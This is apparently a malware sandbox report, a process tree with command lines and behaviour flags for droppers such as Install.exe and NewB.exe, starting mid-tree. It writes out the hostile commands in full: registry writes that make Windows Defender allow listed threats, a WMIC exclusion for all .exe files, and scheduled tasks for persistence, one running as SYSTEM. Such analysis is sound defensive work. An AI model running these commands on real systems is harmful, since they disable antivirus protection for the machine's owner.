                        13⤵ \??\c:\windows\SysWOW64\schtasks.exe
                           cmdline: schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                           PID: 424
                9⤵ C:\Users\Admin\Pictures\OiMQrdAwVVHWkDVgxlIifdu6.exe
                   cmdline: "C:\Users\Admin\Pictures\OiMQrdAwVVHWkDVgxlIifdu6.exe"
                   PID: 1532
                   - Executes dropped EXE
                  10⤵ C:\Users\Admin\AppData\Local\Temp\7zS9824.tmp\Install.exe
                     cmdline: .\Install.exe /tEdidDDf "385118" /S
                     PID: 2884
                     - Checks BIOS information in registry
                     - Executes dropped EXE
                     - Enumerates system info in registry
                    11⤵ C:\Windows\SysWOW64\cmd.exe
                       cmdline: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                       PID: 464
                      12⤵ C:\Windows\SysWOW64\forfiles.exe
                         cmdline: forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                         PID: 5756
                        13⤵ C:\Windows\SysWOW64\cmd.exe
                           cmdline: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                           PID: 5612
                          14⤵ \??\c:\windows\SysWOW64\reg.exe
                             cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                             PID: 1888
                      12⤵ C:\Windows\SysWOW64\forfiles.exe
                         cmdline: forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                         PID: 2532
                        13⤵ C:\Windows\SysWOW64\cmd.exe
                           cmdline: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                           PID: 5996
                          14⤵ \??\c:\windows\SysWOW64\reg.exe
                             cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                             PID: 5532
                      12⤵ C:\Windows\SysWOW64\forfiles.exe
                         cmdline: forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                         PID: 5744
                        13⤵ C:\Windows\SysWOW64\cmd.exe
                           cmdline: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                           PID: 5276
                          14⤵ \??\c:\windows\SysWOW64\reg.exe
                             cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                             PID: 5684
                      12⤵ C:\Windows\SysWOW64\forfiles.exe
                         cmdline: forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                         PID: 5264
                        13⤵ C:\Windows\SysWOW64\cmd.exe
                           cmdline: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                           PID: 4648
                          14⤵ \??\c:\windows\SysWOW64\reg.exe
                             cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                             PID: 5168
                      12⤵ C:\Windows\SysWOW64\forfiles.exe
                         cmdline: forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                         PID: 3372
                        13⤵ C:\Windows\SysWOW64\cmd.exe
                           cmdline: /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                           PID: 5368
                          14⤵ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                             cmdline: powershell start-process -WindowStyle Hidden gpupdate.exe /force
                             PID: 4536
                             - Command and Scripting Interpreter: PowerShell
                            15⤵ C:\Windows\SysWOW64\gpupdate.exe
                               cmdline: "C:\Windows\system32\gpupdate.exe" /force
                               PID: 5828
                    11⤵ C:\Windows\SysWOW64\forfiles.exe
                       cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                       PID: 5632
                      12⤵ C:\Windows\SysWOW64\cmd.exe
                         cmdline: /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                         PID: 4844
                        13⤵ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                           cmdline: powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                           PID: 1480
                           - Command and Scripting Interpreter: PowerShell
                          14⤵ C:\Windows\SysWOW64\Wbem\WMIC.exe
                             cmdline: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                             PID: 2456
                    11⤵ C:\Windows\SysWOW64\schtasks.exe
                       cmdline: schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 04:43:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS9824.tmp\Install.exe\" it /gzCdidTIuK 385118 /S" /V1 /F
                       PID: 5876
                       - Creates scheduled task(s)
                    11⤵ C:\Windows\SysWOW64\forfiles.exe
                       cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
                       PID: 1344
                      12⤵ C:\Windows\SysWOW64\cmd.exe
                         cmdline: /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                         PID: 3344
                        13⤵ \??\c:\windows\SysWOW64\schtasks.exe
                           cmdline: schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                           PID: 6036
              8⤵ C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
                 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
                 PID: 2816
        5⤵ C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
           cmdline: "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe"
           PID: 1336
           - Executes dropped EXE
           - Suspicious use of WriteProcessMemory
          6⤵ C:\Windows\SysWOW64\schtasks.exe
             cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe" /F
             PID: 1792
             - Creates scheduled task(s)
          6⤵ C:\Users\Admin\AppData\Local\Temp\1000251001\ISetup8.exe
             cmdline: "C:\Users\Admin\AppData\Local\Temp\1000251001\ISetup8.exe"
             PID: 3180
             - Executes dropped EXE
             - Suspicious use of WriteProcessMemory
            7⤵ C:\Users\Admin\AppData\Local\Temp\u2gc.0.exe
               cmdline: "C:\Users\Admin\AppData\Local\Temp\u2gc.0.exe"
               PID: 2808
               - Executes dropped EXE
               - Loads dropped DLL
               - Checks processor information in registry
               - Suspicious behavior: EnumeratesProcesses
            7⤵ C:\Users\Admin\AppData\Local\Temp\u2gc.1.exe
               cmdline: "C:\Users\Admin\AppData\Local\Temp\u2gc.1.exe"
               PID: 4600
               - Executes dropped EXE
               - Checks SCSI registry key(s)
               - Suspicious use of FindShellTrayWindow
               - Suspicious use of SendNotifyMessage
              8⤵ C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
                 cmdline: "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
                 PID: 5416
                 - Suspicious behavior: EnumeratesProcesses
                 - Suspicious use of AdjustPrivilegeToken
            7⤵ C:\Windows\SysWOW64\WerFault.exe
               cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3180 -s 1164
               PID: 5060
               - Program crash
    3⤵ C:\Users\Admin\1000006002\ab3480ef7f.exe
       cmdline: "C:\Users\Admin\1000006002\ab3480ef7f.exe"
       PID: 3668
       - Identifies VirtualBox via ACPI registry values (likely anti-VM)
       - Checks BIOS information in registry
       - Executes dropped EXE
       - Checks whether UAC is enabled
1⤵ C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
   cmdline: C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
   PID: 4692
   - Identifies VirtualBox via ACPI registry values (likely anti-VM)
   - Checks BIOS information in registry
   - Executes dropped EXE
   - Identifies Wine through registry keys
   - Suspicious use of NtSetInformationThreadHideFromDebugger
   - Suspicious behavior: EnumeratesProcesses
1⤵ C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
   cmdline: C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
   PID: 1028
   - Identifies VirtualBox via ACPI registry values (likely anti-VM)
   - Checks BIOS information in registry
   - Executes dropped EXE
   - Identifies Wine through registry keys
   - Suspicious use of NtSetInformationThreadHideFromDebugger
   - Suspicious behavior: EnumeratesProcesses
1⤵ C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
   cmdline: C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
   PID: 3864
   - Executes dropped EXE
1⤵ C:\Windows\SysWOW64\WerFault.exe
   cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3180 -ip 3180
   PID: 1476
1⤵ C:\Windows\system32\svchost.exe
   cmdline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
   PID: 3720
1⤵ C:\Windows\system32\svchost.exe
   cmdline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
   PID: 3036
1⤵ C:\Windows\SysWOW64\WerFault.exe
   cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 2472 -ip 2472
   PID: 5688
1⤵ C:\Windows\system32\svchost.exe
   cmdline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
   PID: 3944
C:\Users\Admin\AppData\Local\Temp\7zS8901.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zS8901.tmp\Install.exe it /WbvdidcnYg 385118 /S1⤵PID:2304
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:3912
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵PID:5504
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵PID:5436
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:2292
-
-
-
-
Process tree (continued). Format: [level] PID  image path | command line; sandbox signature hits are listed as bullets under the process.

    [3] PID 2532  C:\Windows\SysWOW64\forfiles.exe | forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
      [4] PID 2396  C:\Windows\SysWOW64\cmd.exe | /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        [5] PID 2028  \??\c:\windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
    [3] PID 2312  C:\Windows\SysWOW64\forfiles.exe | forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
      [4] PID 5244  C:\Windows\SysWOW64\cmd.exe | /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        [5] PID 4120  \??\c:\windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
    [3] PID 5764  C:\Windows\SysWOW64\forfiles.exe | forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
      [4] PID 1960  C:\Windows\SysWOW64\cmd.exe | /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        [5] PID 3752  \??\c:\windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
    [3] PID 5552  C:\Windows\SysWOW64\forfiles.exe | forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
      [4] PID 5568  C:\Windows\SysWOW64\cmd.exe | /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        [5] PID 3628  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell start-process -WindowStyle Hidden gpupdate.exe /force
          - Command and Scripting Interpreter: PowerShell
          [6] PID 3864  C:\Windows\SysWOW64\gpupdate.exe | "C:\Windows\system32\gpupdate.exe" /force
  [2] PID 4620  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
    [3] PID 3796  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      [4] PID 3784  C:\Windows\SysWOW64\reg.exe | REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    [3] PID 5612  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    [3] PID 5892  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    [3] PID 5268  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    [3] PID 5692  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    [3] PID 1036  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    [3] PID 5540  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    [3] PID 5080  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    [3] PID 1548  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    [3] PID 2932  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    [3] PID 5368  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    [3] PID 5996  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    [3] PID 5068  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    [3] PID 5744  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    [3] PID 4676  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    [3] PID 4568  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    [3] PID 4504  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    [3] PID 6028  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    [3] PID 2396  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    [3] PID 6032  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    [3] PID 2436  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    [3] PID 1540  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    [3] PID 3696  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    [3] PID 6064  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    [3] PID 5916  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    [3] PID 2380  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    [3] PID 1112  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    [3] PID 5232  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
